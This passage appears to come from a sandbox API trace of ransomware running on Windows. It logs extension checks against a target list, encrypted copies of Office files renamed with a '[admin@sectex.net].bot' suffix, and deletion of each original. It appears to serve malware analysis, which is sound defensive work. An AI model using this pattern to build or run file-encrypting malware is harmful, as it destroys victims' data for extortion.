	[0146.120] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0146.120] lstrlenW (lpString=".bz2") returned 4
	[0146.120] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0146.120] lstrlenW (lpString=".7z") returned 3
	[0146.120] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0146.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL") returned 56
	[0146.120] lstrlenW (lpString=".dbf") returned 4
	[0146.120] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0146.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL") returned 56
	[0146.121] lstrlenW (lpString=".1cd") returned 4
	[0146.121] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0146.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL") returned 56
	[0146.121] lstrlenW (lpString=".jpg") returned 4
	[0146.121] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0146.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL") returned 56
	[0146.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL") returned 56
	[0146.121] lstrlenW (lpString=".doc") returned 4
	[0146.121] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0146.121] lstrlenW (lpString=".docx") returned 5
	[0146.121] lstrcmpiW (lpString1=".docx", lpString2="C.VSL") returned -1
	[0146.121] lstrlenW (lpString=".pdf") returned 4
	[0146.121] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0146.121] lstrlenW (lpString=".xls") returned 4
	[0146.121] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0146.121] lstrlenW (lpString=".xlsx") returned 5
	[0146.121] lstrcmpiW (lpString1=".xlsx", lpString2="C.VSL") returned -1
	[0146.121] lstrlenW (lpString=".ppt") returned 4
	[0146.121] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0146.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL") returned 56
	[0146.121] lstrlenW (lpString=".zip") returned 4
	[0146.121] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0146.121] lstrlenW (lpString=".rar") returned 4
	[0146.121] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0146.121] lstrlenW (lpString=".bz2") returned 4
	[0146.121] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0146.121] lstrlenW (lpString=".7z") returned 3
	[0146.121] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0146.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL") returned 56
	[0146.121] lstrlenW (lpString=".dbf") returned 4
	[0146.121] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0146.121] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL") returned 56
	[0146.121] lstrlenW (lpString=".1cd") returned 4
	[0146.122] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0146.122] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\HVAC.VSL") returned 56
	[0146.122] lstrlenW (lpString=".jpg") returned 4
	[0146.122] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0146.122] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0146.122] lstrlenW (lpString="INFINTL.DLL") returned 11
	[0146.122] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infintl.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8
	[0146.127] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=481168) returned 1
	[0146.127] CloseHandle (hObject=0x1b8) returned 1
	[0146.127] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infintl.dll")) returned 0x20
	[0146.199] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFINTL.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infintl.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0146.203] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infintl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0146.203] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFINTL.DLL") returned 59
	[0146.203] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFINTL.DLL") returned 59
	[0146.203] lstrlenW (lpString=".doc") returned 4
	[0146.203] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0146.204] lstrlenW (lpString=".docx") returned 5
	[0146.204] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0146.204] lstrlenW (lpString=".pdf") returned 4
	[0146.204] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0146.204] lstrlenW (lpString=".xls") returned 4
	[0146.204] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0146.204] lstrlenW (lpString=".xlsx") returned 5
	[0146.204] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0146.204] lstrlenW (lpString=".ppt") returned 4
	[0146.204] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0146.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFINTL.DLL") returned 59
	[0146.204] lstrlenW (lpString=".zip") returned 4
	[0146.204] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0146.204] lstrlenW (lpString=".rar") returned 4
	[0146.204] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0146.204] lstrlenW (lpString=".bz2") returned 4
	[0146.204] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0146.204] lstrlenW (lpString=".7z") returned 3
	[0146.204] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0146.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFINTL.DLL") returned 59
	[0146.204] lstrlenW (lpString=".dbf") returned 4
	[0146.204] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0146.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFINTL.DLL") returned 59
	[0146.204] lstrlenW (lpString=".1cd") returned 4
	[0146.204] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0146.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFINTL.DLL") returned 59
	[0146.204] lstrlenW (lpString=".jpg") returned 4
	[0146.204] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0146.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFINTL.DLL") returned 59
	[0146.204] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFINTL.DLL") returned 59
	[0146.204] lstrlenW (lpString=".doc") returned 4
	[0146.204] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0146.204] lstrlenW (lpString=".docx") returned 5
	[0146.204] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1
	[0146.205] lstrlenW (lpString=".pdf") returned 4
	[0146.205] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0146.205] lstrlenW (lpString=".xls") returned 4
	[0146.205] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0146.205] lstrlenW (lpString=".xlsx") returned 5
	[0146.205] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1
	[0146.205] lstrlenW (lpString=".ppt") returned 4
	[0146.205] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0146.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFINTL.DLL") returned 59
	[0146.205] lstrlenW (lpString=".zip") returned 4
	[0146.205] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0146.205] lstrlenW (lpString=".rar") returned 4
	[0146.205] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0146.205] lstrlenW (lpString=".bz2") returned 4
	[0146.205] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0146.205] lstrlenW (lpString=".7z") returned 3
	[0146.205] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0146.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFINTL.DLL") returned 59
	[0146.205] lstrlenW (lpString=".dbf") returned 4
	[0146.205] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0146.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFINTL.DLL") returned 59
	[0146.205] lstrlenW (lpString=".1cd") returned 4
	[0146.205] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0146.205] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFINTL.DLL") returned 59
	[0146.205] lstrlenW (lpString=".jpg") returned 4
	[0146.205] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0146.205] lstrcmpiW (lpString1=".HXC", lpString2=".bot") returned 1
	[0146.205] lstrlenW (lpString="INFOPATHEDITOR_COL.HXC") returned 22
	[0146.205] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_col.hxc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0146.206] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=666) returned 1
	[0146.206] CloseHandle (hObject=0x3bc) returned 1
	[0146.206] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_col.hxc")) returned 0x20
	[0146.206] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_col.hxc.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0146.206] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0146.206] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.206] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.207] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_col.hxc.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0146.207] GetLastError () returned 0x0
	[0146.207] ReadFile (in: hFile=0x3bc, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x29a, lpOverlapped=0x0) returned 1
	[0146.209] WriteFile (in: hFile=0x3d0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x2a0, lpOverlapped=0x0) returned 1
	[0146.211] ReadFile (in: hFile=0x3bc, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0146.211] WriteFile (in: hFile=0x3d0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x100, lpOverlapped=0x0) returned 1
	[0146.211] SetEndOfFile (hFile=0x3d0) returned 1
	[0146.211] CloseHandle (hObject=0x3d0) returned 1
	[0146.211] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.211] SetEndOfFile (hFile=0x3bc) returned 1
	[0146.214] CloseHandle (hObject=0x3bc) returned 1
	[0146.214] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXC.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0146.215] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_col.hxc")) returned 1
	[0146.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXC") returned 70
	[0146.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXC") returned 70
	[0146.215] lstrlenW (lpString=".doc") returned 4
	[0146.215] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0146.215] lstrlenW (lpString=".docx") returned 5
	[0146.215] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0146.215] lstrlenW (lpString=".pdf") returned 4
	[0146.215] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0146.215] lstrlenW (lpString=".xls") returned 4
	[0146.215] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0146.215] lstrlenW (lpString=".xlsx") returned 5
	[0146.215] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0146.215] lstrlenW (lpString=".ppt") returned 4
	[0146.215] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0146.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXC") returned 70
	[0146.215] lstrlenW (lpString=".zip") returned 4
	[0146.215] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0146.216] lstrlenW (lpString=".rar") returned 4
	[0146.216] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0146.216] lstrlenW (lpString=".bz2") returned 4
	[0146.216] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0146.216] lstrlenW (lpString=".7z") returned 3
	[0146.216] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0146.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXC") returned 70
	[0146.216] lstrlenW (lpString=".dbf") returned 4
	[0146.216] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0146.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXC") returned 70
	[0146.216] lstrlenW (lpString=".1cd") returned 4
	[0146.216] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0146.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXC") returned 70
	[0146.216] lstrlenW (lpString=".jpg") returned 4
	[0146.216] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0146.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXC") returned 70
	[0146.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXC") returned 70
	[0146.216] lstrlenW (lpString=".doc") returned 4
	[0146.216] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0146.216] lstrlenW (lpString=".docx") returned 5
	[0146.216] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0146.216] lstrlenW (lpString=".pdf") returned 4
	[0146.216] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0146.216] lstrlenW (lpString=".xls") returned 4
	[0146.216] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0146.216] lstrlenW (lpString=".xlsx") returned 5
	[0146.216] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0146.216] lstrlenW (lpString=".ppt") returned 4
	[0146.216] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0146.216] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXC") returned 70
	[0146.216] lstrlenW (lpString=".zip") returned 4
	[0146.216] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0146.216] lstrlenW (lpString=".rar") returned 4
	[0146.216] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0146.217] lstrlenW (lpString=".bz2") returned 4
	[0146.217] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0146.217] lstrlenW (lpString=".7z") returned 3
	[0146.217] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0146.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXC") returned 70
	[0146.217] lstrlenW (lpString=".dbf") returned 4
	[0146.217] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0146.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXC") returned 70
	[0146.217] lstrlenW (lpString=".1cd") returned 4
	[0146.217] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0146.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXC") returned 70
	[0146.217] lstrlenW (lpString=".jpg") returned 4
	[0146.217] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0146.217] lstrcmpiW (lpString1=".HXT", lpString2=".bot") returned 1
	[0146.217] lstrlenW (lpString="INFOPATHEDITOR_COL.HXT") returned 22
	[0146.217] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_col.hxt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0146.218] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=214) returned 1
	[0146.218] CloseHandle (hObject=0x3bc) returned 1
	[0146.218] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_col.hxt")) returned 0x20
	[0146.218] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_col.hxt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0146.219] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0146.219] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.219] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.219] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_col.hxt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0146.219] GetLastError () returned 0x0
	[0146.219] ReadFile (in: hFile=0x3bc, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0xd6, lpOverlapped=0x0) returned 1
	[0146.220] WriteFile (in: hFile=0x3d0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xe0, lpOverlapped=0x0) returned 1
	[0146.221] ReadFile (in: hFile=0x3bc, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0146.221] WriteFile (in: hFile=0x3d0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x100, lpOverlapped=0x0) returned 1
	[0146.221] SetEndOfFile (hFile=0x3d0) returned 1
	[0146.221] CloseHandle (hObject=0x3d0) returned 1
	[0146.221] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0146.221] SetEndOfFile (hFile=0x3bc) returned 1
	[0146.224] CloseHandle (hObject=0x3bc) returned 1
	[0146.224] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0146.224] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopatheditor_col.hxt")) returned 1
	[0146.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT") returned 70
	[0146.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT") returned 70
	[0146.225] lstrlenW (lpString=".doc") returned 4
	[0146.225] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0146.225] lstrlenW (lpString=".docx") returned 5
	[0146.225] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0146.225] lstrlenW (lpString=".pdf") returned 4
	[0146.225] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0146.225] lstrlenW (lpString=".xls") returned 4
	[0146.225] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0146.225] lstrlenW (lpString=".xlsx") returned 5
	[0146.225] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0146.225] lstrlenW (lpString=".ppt") returned 4
	[0146.225] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0146.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT") returned 70
	[0146.225] lstrlenW (lpString=".zip") returned 4
	[0146.225] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0146.225] lstrlenW (lpString=".rar") returned 4
	[0146.225] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0146.225] lstrlenW (lpString=".bz2") returned 4
	[0146.225] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0146.225] lstrlenW (lpString=".7z") returned 3
	[0146.225] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0146.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT") returned 70
	[0146.225] lstrlenW (lpString=".dbf") returned 4
	[0146.225] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0146.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT") returned 70
	[0146.225] lstrlenW (lpString=".1cd") returned 4
	[0146.225] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0146.225] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT") returned 70
	[0146.225] lstrlenW (lpString=".jpg") returned 4
	[0146.226] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0146.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT") returned 70
	[0146.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT") returned 70
	[0146.226] lstrlenW (lpString=".doc") returned 4
	[0146.226] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0146.226] lstrlenW (lpString=".docx") returned 5
	[0146.226] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0146.226] lstrlenW (lpString=".pdf") returned 4
	[0146.226] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0146.226] lstrlenW (lpString=".xls") returned 4
	[0146.226] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0146.226] lstrlenW (lpString=".xlsx") returned 5
	[0146.226] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0146.226] lstrlenW (lpString=".ppt") returned 4
	[0146.226] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0146.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT") returned 70
	[0146.226] lstrlenW (lpString=".zip") returned 4
	[0146.226] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0146.226] lstrlenW (lpString=".rar") returned 4
	[0146.226] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0146.226] lstrlenW (lpString=".bz2") returned 4
	[0146.226] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0146.226] lstrlenW (lpString=".7z") returned 3
	[0146.226] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0146.226] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT") returned 70
	[0146.226] lstrlenW (lpString=".dbf") returned 4
	[0146.227] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0146.227] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATHEDITOR_COL.HXT") returned 70
	[0146.227] lstrlenW (lpString=".1cd") returned 4
